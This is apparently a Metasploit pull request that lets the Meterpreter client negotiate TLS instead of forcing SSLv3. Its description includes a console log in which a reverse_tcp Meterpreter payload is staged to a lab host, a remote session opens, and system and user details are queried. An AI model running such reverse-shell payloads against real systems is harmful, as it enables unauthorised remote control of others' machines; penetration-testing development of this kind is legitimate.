### PR TITLE
Allow non-SSLv3 Meterpreters (auto-negotiate)

### DIFF
--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -248,7 +248,7 @@ class Client
     cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
     cert.sign(key, OpenSSL::Digest::SHA1.new)
 
-    ctx = OpenSSL::SSL::SSLContext.new(:SSLv3)
+    ctx = OpenSSL::SSL::SSLContext.new
     ctx.key = key
     ctx.cert = cert
 


### PR DESCRIPTION
This is backwards compatible with existing SSLv3 meterpreter payloads and supports TLSv1.

```
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > save
Saved configuration to: /home/hdm/.msf4/config
msf exploit(handler) > run

[*] Started reverse handler on 192.168.0.4:4444 
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (769566 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.6:33520) at 2014-10-15 14:00:47 -0500

meterpreter > sysinfo
Computer        : Z420
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: z420\Developer
```
